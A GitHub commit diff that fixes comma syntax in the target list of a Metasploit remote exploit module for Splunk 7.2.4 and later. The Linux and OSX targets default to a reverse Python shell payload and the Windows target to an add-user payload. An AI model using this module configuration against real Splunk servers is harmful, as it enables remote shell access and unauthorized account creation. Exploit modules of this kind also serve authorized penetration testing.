fixed standard payload syntax

master
Matteo Malvica 2019-03-18 19:00:33 +01:00 committed by GitHub
parent d7d49cba2e
commit 3316e8c4bf
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 3 deletions

View File

@ -48,21 +48,21 @@ class MetasploitModule < Msf::Exploit::Remote
[ 'Splunk >= 7.2.4 / Linux', [ 'Splunk >= 7.2.4 / Linux',
{ {
'Arch' => ARCH_CMD, 'Arch' => ARCH_CMD,
'Platform' => %w(linux unix) 'Platform' => %w(linux unix),
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'} 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'}
} }
], ],
[ 'Splunk >= 7.2.4 / Windows', [ 'Splunk >= 7.2.4 / Windows',
{ {
'Arch' => ARCH_CMD, 'Arch' => ARCH_CMD,
'Platform' => 'win' 'Platform' => 'win',
'DefaultOptions' => {'PAYLOAD' => 'cmd/windows/adduser'} 'DefaultOptions' => {'PAYLOAD' => 'cmd/windows/adduser'}
} }
], ],
[ 'Splunk >= 7.2.4 / OSX', [ 'Splunk >= 7.2.4 / OSX',
{ {
'Arch' => ARCH_CMD, 'Arch' => ARCH_CMD,
'Platform' => %w(linux unix) 'Platform' => %w(linux unix),
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'} 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'}
} }
], ],